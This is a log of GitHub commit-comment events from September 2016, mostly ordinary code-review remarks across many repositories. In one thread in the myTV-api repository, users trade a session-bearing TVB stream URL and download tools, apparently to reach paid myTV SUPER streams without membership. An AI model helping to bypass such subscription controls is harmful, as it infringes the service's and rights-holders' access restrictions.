{"id":"4613729665","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162447,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:54:53Z","updated_at":"2016-09-25T05:54:53Z","body":"7473768"}},"created_at":"2016-09-25T05:54:53Z"}
{"id":"4613730343","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162449,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:55:30Z","updated_at":"2016-09-25T05:55:30Z","body":"@popolihu123 7473768是？\r\n"}},"created_at":"2016-09-25T05:55:30Z"}
{"id":"4613730584","type":"CommitCommentEvent","actor":{"login":"1978lo"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162451,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:55:42Z","updated_at":"2016-09-25T05:55:42Z","body":"@lakb8 同問"}},"created_at":"2016-09-25T05:55:42Z"}
{"id":"4613730912","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162453,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:56:02Z","updated_at":"2016-09-25T05:56:02Z","body":"@huahua333  我直接放弃 一个一个去抓  还是放弃吧 我都想一脚踢"}},"created_at":"2016-09-25T05:56:02Z"}
{"id":"4613731251","type":"CommitCommentEvent","actor":{"login":"brittainmedia"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19162455,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-25T05:56:23Z","updated_at":"2016-09-25T05:56:23Z","body":"my mistake, thought someone had migrated over some changes from another winbinder php7 build from a jp blog. Interested in seeing winbinder being updated/fixed!\r\n\r\nGot a PHP extensions coder to take a look over it and he says there are over a hundred issues with it :(\r\n\r\nI am still happily coding away with it though (using wbobjects) :D"}},"created_at":"2016-09-25T05:56:23Z"}
{"id":"4613731269","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162456,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:56:25Z","updated_at":"2016-09-25T05:56:25Z","body":"@lakb8, 1978lo, liuhui19994, popolihu123 We can proceed with you was not. I only know English only."}},"created_at":"2016-09-25T05:56:25Z"}
{"id":"4613731997","type":"CommitCommentEvent","actor":{"login":"ivanbrennan"},"repo":{"name":"ivanbrennan/magit"},"payload":{"comment":{"id":19162457,"position":5,"line":505,"path":"lisp/magit.el","commit_id":"ef953927d4f2ff1d3c8db56541b53215dd635090","created_at":"2016-09-25T05:57:13Z","updated_at":"2016-09-25T05:57:13Z","body":"Also, setting `find-file-visit-truename` to `nil` produces the desired behavior without necessitating this change. But I want it to be `t`."}},"created_at":"2016-09-25T05:57:13Z"}
{"id":"4613732411","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162459,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:57:43Z","updated_at":"2016-09-25T05:57:43Z","body":"@popolihu123 验证问题8888，答案是什么"}},"created_at":"2016-09-25T05:57:43Z"}
{"id":"4613732737","type":"CommitCommentEvent","actor":{"login":"DroidThug"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162460,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T05:58:06Z","updated_at":"2016-09-25T05:58:06Z","body":"Hi.\r\n\r\nWhy use CM dependencies? Try switching to OmniROM 6.0 :grin:"}},"created_at":"2016-09-25T05:58:06Z"}
{"id":"4613733396","type":"CommitCommentEvent","actor":{"login":"DroidThug"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162464,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T05:58:54Z","updated_at":"2016-09-25T05:58:54Z","body":"If you would like some help, contact me on Telegram, @DroidThug  is the username "}},"created_at":"2016-09-25T05:58:54Z"}
{"id":"4613733711","type":"CommitCommentEvent","actor":{"login":"iesteban"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":19162465,"position":11,"line":11,"path":"webapp/static/webapp/js/geoexample.js","commit_id":"24e6a225d953bcdeb573063b84a3199a82863511","created_at":"2016-09-25T05:59:14Z","updated_at":"2016-09-25T05:59:14Z","body":"Yes, it's working in my phone. Sorry. \r\n\r\nIt could be because of Linux Mint then. \r\nI am getting this in my console. \r\n\r\n![selection_003](https://cloud.githubusercontent.com/assets/1064224/18813280/4c37e86a-82f5-11e6-8fb4-3c345e259d9a.png)\r\n\r\nAnd I thought it was because of this line in geolocation.js: \r\n`\r\nvar img_url = \"http://maps.googleapis.com/maps/api/staticmap?center=\"+latlon+\"&zoom=14&size=400x300&sensor=false\";\r\n`\r\n\r\nBut I wouldn't care since seems to be working perfectly. Sorry for the false positive."}},"created_at":"2016-09-25T05:59:14Z"}
{"id":"4613733987","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162468,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:59:34Z","updated_at":"2016-09-25T05:59:34Z","body":"http://202.126.56.114:80/session/0d751464-82e5-11e6-be70-005056b16cc2/wsv3vt/mpsdrmv_audioindex0/_definst_/smil:vipo/mytvsuper8/8689/868861/868861_mobile_auto.smil/chunklist_b1500000.m3u8?audioindex=0\r\n\r\n改链接vipo"}},"created_at":"2016-09-25T05:59:34Z"}
{"id":"4613734147","type":"CommitCommentEvent","actor":{"login":"kaneawk"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162470,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T05:59:46Z","updated_at":"2016-09-25T05:59:46Z","body":"OmniROM couldn't load the qseecomd, I don't know why."}},"created_at":"2016-09-25T05:59:46Z"}
{"id":"4613734364","type":"CommitCommentEvent","actor":{"login":"manassamatovich"},"repo":{"name":"manassamatovich/andTest"},"payload":{"comment":{"id":19162472,"position":1,"line":1,"path":"test.txt","commit_id":"9da14924d802911c381d7646ab8f7f18c9c21fb3","created_at":"2016-09-25T06:00:02Z","updated_at":"2016-09-25T06:00:02Z","body":"restore"}},"created_at":"2016-09-25T06:00:02Z"}
{"id":"4613734984","type":"CommitCommentEvent","actor":{"login":"jaredallard"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19162489,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-25T06:00:24Z","updated_at":"2016-09-25T06:00:24Z","body":"Just was taking a shot at it for the community, not a C programmer or PHP programmer in anyway anymore.\r\n\r\nOn Sat, Sep 24, 2016, 10:56 PM Stefan Brittain <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\nmy mistake, thought someone had migrated over some changes from another winbinder php7 build from a jp blog. Interested in seeing winbinder being updated/fixed!\r\n\r\nGot a PHP extensions coder to take a look over it and he says there are over a hundred issues with it :(\r\n\r\nI am still happily coding away with it though (using wbobjects) :D\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/stefan-loewe/WinBinder/commit/7435b517be103c6ba68e57573185b0d373a16466#commitcomment-19162455>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ACR9NZx3aGaPUHQe0gL7iytKkwp1vksVks5qtg0IgaJpZM4KFwFp>.\r\n"}},"created_at":"2016-09-25T06:00:24Z"}
{"id":"4613735289","type":"CommitCommentEvent","actor":{"login":"empinto"},"repo":{"name":"empinto/ludo"},"payload":{"comment":{"id":19162500,"position":null,"line":null,"path":null,"commit_id":"e45f6a1d15320f937067e327b8442e0889b709c9","created_at":"2016-09-25T06:00:40Z","updated_at":"2016-09-25T06:00:40Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[LUDO-6]: Montar estrutura do projeto no GitHub](https://trello.com/c/Tlv2DSRU/8-ludo-6-montar-estrutura-do-projeto-no-github)"}},"created_at":"2016-09-25T06:00:40Z"}
{"id":"4613735750","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162504,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:01:09Z","updated_at":"2016-09-25T06:01:09Z","body":"@lakb8 session怎么来的\r\n"}},"created_at":"2016-09-25T06:01:09Z"}
{"id":"4613736828","type":"CommitCommentEvent","actor":{"login":"huahua333"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162516,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:02:13Z","updated_at":"2016-09-25T06:02:13Z","body":"http://202.126.56.114:80/session/0d751464-82e5-11e6-be70-005056b16cc2/wsv3vt怎麽獲得的"}},"created_at":"2016-09-25T06:02:13Z"}
{"id":"4613737016","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162517,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:02:24Z","updated_at":"2016-09-25T06:02:24Z","body":"http://ads.cdn.tvb.com/. 不是这个啊 @lakb8 "}},"created_at":"2016-09-25T06:02:24Z"}
{"id":"4613737878","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162518,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:03:15Z","updated_at":"2016-09-25T06:03:15Z","body":"我的微信号ilovetvb1"}},"created_at":"2016-09-25T06:03:15Z"}
{"id":"4613738501","type":"CommitCommentEvent","actor":{"login":"DroidThug"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162519,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T06:03:56Z","updated_at":"2016-09-25T06:03:56Z","body":"@kaneawk lemme give it a try, maybe we could try to solve stuff. Probably some missing stuff in the vendor files? Could you link me to the vendor files of Griffin?"}},"created_at":"2016-09-25T06:03:56Z"}
{"id":"4613739304","type":"CommitCommentEvent","actor":{"login":"missedone"},"repo":{"name":"mschreiber/tychoTestNGExample"},"payload":{"comment":{"id":19162522,"position":6,"line":6,"path":"tests/at.mschreiber.test.base/META-INF/MANIFEST.MF","commit_id":"31b9dd0aac6e7078678f54317c47e438c3959400","created_at":"2016-09-25T06:04:44Z","updated_at":"2016-09-25T06:04:44Z","body":"bsh need to be in the `Bundle-ClassPath` list as well."}},"created_at":"2016-09-25T06:04:44Z"}
{"id":"4613742190","type":"CommitCommentEvent","actor":{"login":"kaneawk"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162531,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T06:07:47Z","updated_at":"2016-09-25T06:07:47Z","body":"May be not. I use the same config, but omni does not work."}},"created_at":"2016-09-25T06:07:47Z"}
{"id":"4613742263","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162532,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:07:52Z","updated_at":"2016-09-25T06:07:52Z","body":"lakb8 Please email."}},"created_at":"2016-09-25T06:07:52Z"}
{"id":"4613743136","type":"CommitCommentEvent","actor":{"login":"Toufukun"},"repo":{"name":"Toufukun/GiriGiriPlayer"},"payload":{"comment":{"id":19162533,"position":null,"line":null,"path":null,"commit_id":"01958c13f32fb62524a32e2e9411b4190e0c1a73","created_at":"2016-09-25T06:08:49Z","updated_at":"2016-09-25T06:08:49Z","body":"I hadn't noticed that. Thanks."}},"created_at":"2016-09-25T06:08:49Z"}
{"id":"4613743591","type":"CommitCommentEvent","actor":{"login":"DroidThug"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162534,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T06:09:20Z","updated_at":"2016-09-25T06:09:20Z","body":"Well.... Seems like an issue in vendor/moto/griffin....."}},"created_at":"2016-09-25T06:09:20Z"}
{"id":"4613743994","type":"CommitCommentEvent","actor":{"login":"EionRobb"},"repo":{"name":"bitlbee/bitlbee"},"payload":{"comment":{"id":19162536,"position":null,"line":null,"path":null,"commit_id":"1a8875ffaae873853fd8537cdce43e35e9889266","created_at":"2016-09-25T06:09:46Z","updated_at":"2016-09-25T06:09:46Z","body":"I like this Alot."}},"created_at":"2016-09-25T06:09:46Z"}
{"id":"4613744585","type":"CommitCommentEvent","actor":{"login":"iceman1001"},"repo":{"name":"menshiyun/proxmark3"},"payload":{"comment":{"id":19162539,"position":null,"line":null,"path":null,"commit_id":"775c4c4a282900d14d4a612c9cb1435f8059d627","created_at":"2016-09-25T06:10:19Z","updated_at":"2016-09-25T06:10:19Z","body":"Thanks for you contribution,\r\nI am not found of this solution,  if you look into https://github.com/iceman1001/proxmark3/blob/master/client/Makefile  you'll see a different way of adding options to the LDLIBS var and where to put it.\r\n\r\nIf you do those changes, I'll be happy to merge it. \r\n"}},"created_at":"2016-09-25T06:10:19Z"}
{"id":"4613746155","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162545,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:12:01Z","updated_at":"2016-09-25T06:12:01Z","body":"@tokentvb my telegram is @lakb_8.\r\nCanyou join me？"}},"created_at":"2016-09-25T06:12:01Z"}
{"id":"4613746486","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162546,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:12:24Z","updated_at":"2016-09-25T06:12:24Z","body":"http://202.126.56.114:80/session/0d751464-82e5-11e6-be70-005056b16cc2/wsv3vt/mpsdrmv_audioindex0/_definst_/smil:vipo/mytvsuper8/8689/868861/868861_mobile_auto.smil/chunklist_b1500000.m3u8?audioindex=0. No download lakb8. "}},"created_at":"2016-09-25T06:12:24Z"}
{"id":"4613747564","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162549,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:13:30Z","updated_at":"2016-09-25T06:13:30Z","body":"Research GOTV and MYTVSUPER"}},"created_at":"2016-09-25T06:13:30Z"}
{"id":"4613749904","type":"CommitCommentEvent","actor":{"login":"mafru"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19162552,"position":15,"line":15,"path":"system/controllers/users/actions/profile_edit_sessions.php","commit_id":"ce5d6254a8a58398f581c7254319c9dce79a4e9b","created_at":"2016-09-25T06:15:51Z","updated_at":"2016-09-25T06:15:51Z","body":"Пользователь с правами администратора, всегда видит только свои сеансы, даже когда просматривает настройки чужого профиля.\r\nМожет в функцию передавать $profile['id']"}},"created_at":"2016-09-25T06:15:51Z"}
{"id":"4613751366","type":"CommitCommentEvent","actor":{"login":"kaneawk"},"repo":{"name":"kaneawk/android_device_moto_griffin"},"payload":{"comment":{"id":19162555,"position":null,"line":null,"path":null,"commit_id":"7f9914b08fc1eb4b6dcfbc0f09a5b87fcb45e691","created_at":"2016-09-25T06:17:16Z","updated_at":"2016-09-25T06:17:16Z","body":"Build the TWRP does not need vendor path."}},"created_at":"2016-09-25T06:17:16Z"}
{"id":"4613755382","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162567,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:21:15Z","updated_at":"2016-09-25T06:21:15Z","body":"@liuhui19994  四个4  4444"}},"created_at":"2016-09-25T06:21:15Z"}
{"id":"4613755704","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162569,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:21:37Z","updated_at":"2016-09-25T06:21:37Z","body":"I have get gotv done,but i am not the mytvsuper member,so,i cannot research super."}},"created_at":"2016-09-25T06:21:37Z"}
{"id":"4613757009","type":"CommitCommentEvent","actor":{"login":"ArielTEP"},"repo":{"name":"ArielTEP/AEEGv1"},"payload":{"comment":{"id":19162573,"position":null,"line":null,"path":null,"commit_id":"2bf2a4e4379e18b7ad3a29b7332fda89098ea936","created_at":"2016-09-25T06:23:01Z","updated_at":"2016-09-25T06:23:01Z","body":"Last changes, with the correct backend connection logic"}},"created_at":"2016-09-25T06:23:01Z"}
{"id":"4613761125","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"mpc-hc/mpc-hc"},"payload":{"comment":{"id":19162588,"position":null,"line":null,"path":null,"commit_id":"6bde816a2de9e7ea985b846ec652076a4d0970e3","created_at":"2016-09-25T06:27:20Z","updated_at":"2016-09-25T06:27:20Z","body":"@kasper93: I have these https://github.com/mpc-hc/mpc-hc/compare/develop...XhmikosR:develop\r\n\r\nThese are the latest cppcheck warnings from my branch after removing some of the FP:\r\n\r\n```\r\n[..\\src\\mpc-hc\\AppSettings.h:221]: (performance) Function parameter '_dm' should be passed by reference.\r\n[..\\src\\mpc-hc\\FakeFilterMapper2.h:54]: (performance) Variable 'type' is assigned in constructor body. Consider performing initialization in initialization list.\r\n[..\\src\\mpc-hc\\DeinterlacerFilter.cpp:97]: (style) Variable 'pDataOut2' is assigned a value that is never used.\r\n[..\\src\\mpc-hc\\MainFrm.cpp:8904]: (style) Variable 'hr' is assigned a value that is never used.\r\n[..\\src\\mpc-hc\\MainFrm.cpp:14422]: (style) Variable 'hr' is assigned a value that is never used.\r\n[..\\src\\mpc-hc\\PPageAdvanced.h:80]: (performance) Function parameter 'range' should be passed by reference.\r\n[..\\src\\mpc-hc\\PPageAdvanced.h:101]: (performance) Function parameter 'list' should be passed by reference.\r\n[..\\src\\mpc-hc\\RealMediaGraph.cpp:391]: (style) Variable 'refc' is assigned a value that is never used.\r\n[..\\src\\mpc-hc\\SaveSubtitlesFileDialog.cpp:34]: (performance) Function parameter 'types' should be passed by reference.\r\n[..\\src\\mpc-hc\\SubtitlesProvider.cpp:810]: (style) Variable 'name' is assigned a value that is never used.\r\n[..\\src\\mpc-hc\\SubtitlesProvider.cpp:811]: (style) Variable 'strAttr' is assigned a value that is never used.\r\n[..\\src\\mpc-hc\\SubtitlesProviders.cpp:862]: (style) struct member 'Anonymous32::pSubtitlesInfo' is never used.\r\n[..\\src\\mpc-hc\\SubtitlesProviders.cpp:863]: (style) struct member 'Anonymous32::bActivate' is never used.\r\n[..\\src\\mpc-hc\\SubtitlesProviders.cpp:511]: (performance) Function parameter 'referer' should be passed by reference.\r\n```"}},"created_at":"2016-09-25T06:27:20Z"}
{"id":"4613761763","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"mefilt/Networking"},"payload":{"comment":{"id":19162590,"position":null,"line":null,"path":null,"commit_id":"197f322f9b0dc8f79214e5a39e85b000b4376eb3","created_at":"2016-09-25T06:28:01Z","updated_at":"2016-09-25T06:28:01Z","body":"@mefilt Hi!\r\n\r\nYou could also use this :)\r\n\r\nhttps://github.com/mefilt/Networking/blob/197f322f9b0dc8f79214e5a39e85b000b4376eb3/Sources/Networking.swift#L287-L296\r\n"}},"created_at":"2016-09-25T06:28:01Z"}
{"id":"4613763186","type":"CommitCommentEvent","actor":{"login":"DeDivers"},"repo":{"name":"MountainRange/fbaas"},"payload":{"comment":{"id":19162601,"position":null,"line":null,"path":null,"commit_id":"87f39691b2740644fb6f7e183ecf4507913ad35e","created_at":"2016-09-25T06:29:41Z","updated_at":"2016-09-25T06:29:41Z","body":"But why?"}},"created_at":"2016-09-25T06:29:41Z"}
{"id":"4613767165","type":"CommitCommentEvent","actor":{"login":"KingRaptor"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":19162610,"position":null,"line":null,"path":null,"commit_id":"24717568019978ba03079f3f535f624a444e5eb0","created_at":"2016-09-25T06:33:59Z","updated_at":"2016-09-25T06:33:59Z","body":"Is it failing because some part of infra doesn't know to let the player download the rapid tag mod before trying to launch the mission? That would explain why we devs can't reproduce it (already have mod downloaded)."}},"created_at":"2016-09-25T06:33:59Z"}
{"id":"4613769120","type":"CommitCommentEvent","actor":{"login":"noctifer"},"repo":{"name":"BorkBorkGoesTheCode/Cataclysm-DDA"},"payload":{"comment":{"id":19162616,"position":null,"line":null,"path":null,"commit_id":"148673975ace91f117aecc8fed713ce1ed404838","created_at":"2016-09-25T06:36:01Z","updated_at":"2016-09-25T06:36:01Z","body":"Didn't you mean @Noctifer-de-Mortem?\r\n"}},"created_at":"2016-09-25T06:36:01Z"}
{"id":"4613773610","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19162623,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T06:40:45Z","updated_at":"2016-09-25T06:40:45Z","body":"I mean, things would be same. You should revert those commits."}},"created_at":"2016-09-25T06:40:45Z"}
{"id":"4613774774","type":"CommitCommentEvent","actor":{"login":"BorkBorkGoesTheCode"},"repo":{"name":"BorkBorkGoesTheCode/Cataclysm-DDA"},"payload":{"comment":{"id":19162628,"position":null,"line":null,"path":null,"commit_id":"148673975ace91f117aecc8fed713ce1ed404838","created_at":"2016-09-25T06:41:57Z","updated_at":"2016-09-25T06:41:57Z","body":"Indeed."}},"created_at":"2016-09-25T06:41:57Z"}
{"id":"4613777269","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162639,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:44:36Z","updated_at":"2016-09-25T06:44:36Z","body":"lakb8. I have get GOTV. But know download."}},"created_at":"2016-09-25T06:44:36Z"}
{"id":"4613779015","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19162650,"position":33,"line":67,"path":"package.json","commit_id":"32b52074451ead322b3dd2e1d6e0bbcc498b0941","created_at":"2016-09-25T06:46:26Z","updated_at":"2016-09-25T06:46:26Z","body":"Mocha is a dependency for development. Its not actually used in production code for execution. This should be a devDependency rather than an actual dependency"}},"created_at":"2016-09-25T06:46:26Z"}
{"id":"4613779177","type":"CommitCommentEvent","actor":{"login":"Stankec"},"repo":{"name":"Stankec/google-analytics-turbolinks"},"payload":{"comment":{"id":19162651,"position":null,"line":null,"path":null,"commit_id":"ffec14c18fce694f15a8f6bcb9824a09a0a4103d","created_at":"2016-09-25T06:46:38Z","updated_at":"2016-09-25T06:46:38Z","body":"What I did here is wrong. \r\nIt should be the `turbolinks:request-start` event. \r\nThis only worked for me because in the project I was working on at the time, there was a script that converted the new event to the old one. I would suggest you use the original repo as it works quite well 😄. I am going to delete this repo, as not to confuse even more people."}},"created_at":"2016-09-25T06:46:38Z"}
{"id":"4613779224","type":"CommitCommentEvent","actor":{"login":"1978lo"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162652,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:46:41Z","updated_at":"2016-09-25T06:46:41Z","body":"@tokentvb Please email.\r\n"}},"created_at":"2016-09-25T06:46:41Z"}
{"id":"4613781290","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19162661,"position":19,"line":18,"path":"src/head_server/schedulers/RandomSchedulerType.js","commit_id":"32b52074451ead322b3dd2e1d6e0bbcc498b0941","created_at":"2016-09-25T06:48:51Z","updated_at":"2016-09-25T06:48:51Z","body":"Rather than calling back a list of clients, it'd be better to return a list of id's of those clients."}},"created_at":"2016-09-25T06:48:51Z"}
{"id":"4613781615","type":"CommitCommentEvent","actor":{"login":"aberghage"},"repo":{"name":"Hrothen/textwrap"},"payload":{"comment":{"id":19162666,"position":31,"line":null,"path":"src/Data/Text/Wrap.hs","commit_id":"aacc117814f2d842b65e441104cf6f3dd448a6d9","created_at":"2016-09-25T06:49:10Z","updated_at":"2016-09-25T06:49:10Z","body":"This is way nicer"}},"created_at":"2016-09-25T06:49:10Z"}
{"id":"4613781925","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19162668,"position":24,"line":23,"path":"src/head_server/schedulers/RandomSchedulerType.js","commit_id":"32b52074451ead322b3dd2e1d6e0bbcc498b0941","created_at":"2016-09-25T06:49:36Z","updated_at":"2016-09-25T06:49:36Z","body":"I don't know what the purpose of this function is supposed to be, but this functionality to return the list of clients would be better put in the `genNext` function"}},"created_at":"2016-09-25T06:49:36Z"}
{"id":"4613782167","type":"CommitCommentEvent","actor":{"login":"aberghage"},"repo":{"name":"Hrothen/textwrap"},"payload":{"comment":{"id":19162670,"position":35,"line":null,"path":"src/Data/Text/Wrap.hs","commit_id":"aacc117814f2d842b65e441104cf6f3dd448a6d9","created_at":"2016-09-25T06:49:52Z","updated_at":"2016-09-25T06:49:52Z","body":"Likewise here, readability++"}},"created_at":"2016-09-25T06:49:52Z"}
{"id":"4613783272","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19162674,"position":5,"line":34,"path":"src/head_server/schedulers/Scheduler.js","commit_id":"32b52074451ead322b3dd2e1d6e0bbcc498b0941","created_at":"2016-09-25T06:51:05Z","updated_at":"2016-09-25T06:51:05Z","body":"genNext takes a callback. scheduleOnce should probably be modified to take a callback and then an anonymous function within genNext call that callback."}},"created_at":"2016-09-25T06:51:05Z"}
{"id":"4613783773","type":"CommitCommentEvent","actor":{"login":"samosaara"},"repo":{"name":"felipeagc/MMOThing"},"payload":{"comment":{"id":19162676,"position":4,"line":7,"path":"src/views/index.pug","commit_id":"6433dd683154948ce93a1b294c5b5336b41f63d6","created_at":"2016-09-25T06:51:33Z","updated_at":"2016-09-25T06:51:33Z","body":"@felipeagc você disse que queria hostear, coloquei so pra testar. Substitui por static depois."}},"created_at":"2016-09-25T06:51:33Z"}
{"id":"4613784355","type":"CommitCommentEvent","actor":{"login":"samosaara"},"repo":{"name":"felipeagc/MMOThing"},"payload":{"comment":{"id":19162680,"position":16,"line":25,"path":"gulpfile.js","commit_id":"6433dd683154948ce93a1b294c5b5336b41f63d6","created_at":"2016-09-25T06:52:09Z","updated_at":"2016-09-25T06:52:09Z","body":"Double Pun intended."}},"created_at":"2016-09-25T06:52:09Z"}
{"id":"4613784360","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162681,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:52:10Z","updated_at":"2016-09-25T06:52:10Z","body":"@tokentvb use idm"}},"created_at":"2016-09-25T06:52:10Z"}
{"id":"4613784477","type":"CommitCommentEvent","actor":{"login":"Fighting-HoneyGirl"},"repo":{"name":"Fighting-HoneyGirl/test"},"payload":{"comment":{"id":19162683,"position":5,"line":5,"path":"测试.txt","commit_id":"1e14a680e2ce73c7355cf4e2caa20d8bf8ad6e9b","created_at":"2016-09-25T06:52:16Z","updated_at":"2016-09-25T06:52:16Z","body":"测试添加一行文本"}},"created_at":"2016-09-25T06:52:16Z"}
{"id":"4613786002","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162689,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T06:53:51Z","updated_at":"2016-09-25T06:53:51Z","body":"IDM, Livestreamer, ffmg no download. because wowza 404."}},"created_at":"2016-09-25T06:53:51Z"}
